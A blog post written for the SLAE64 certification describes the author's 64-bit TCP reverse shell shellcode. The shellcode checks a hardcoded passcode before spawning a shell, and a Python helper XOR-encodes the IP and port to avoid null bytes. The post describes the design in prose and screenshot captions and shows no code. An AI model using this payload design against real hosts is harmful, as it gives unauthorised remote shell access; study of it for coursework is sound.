The second assigment for the SLAE64 certification asks to write a TCP Reverse Shell shellcode that connects to an address and a port and then executes a shell after verifying a “passcode” on successful connection.

For the basic structure of a Reverse Shell TCP, please refer to assignment 5 and to related assignment for the SLAE32 certification.

In order to verify the passcode, a code section has been added after the dup2 cycle, in order to perform a read syscall which puts the 8 bytes read on the stack and compares with the hardcoded passcode (acceptme).

If the comparison is successful, then the execve is performed: Reverse TCP - Example with successful connection and passcode

If the submitted passcode is wrong, the program exits with status code 6: Reverse TCP - Example with wrong passcode submitted

I have also added to the shellcode a check after the connect() syscall: if the connection is not successful (e.g. due to wrong listener activated) then the program exits with status code 1: Reverse TCP - Example with unsuccessful connection

Customization Utility

In order for the reverse shell to be customizable, the ReverseShell-Skeleton.nasm file has been created with a placeholders to be filled with appropriate chosen ip and port (line 24).

Given that the bytes have to be inserted as XOR-ed with 0xFF, in order to avoid null ones, the comes handy as it just requires to be executed passing the IP and Port for the connection as parameters, and appropriate value will be calculated and presented to the user: Reverse TCP - Python utility

The following screenshot shows the shell to localhost on port 6969, for which the parameter has been generated with the Python utility: Reverse TCP - PoC of the Python utility on localhost:6969

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: PA-29059
GitHub repository:

This assignment has been written on a Kali Linux 2021.1 64-bit virtual machine:

└─$ uname -a
Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux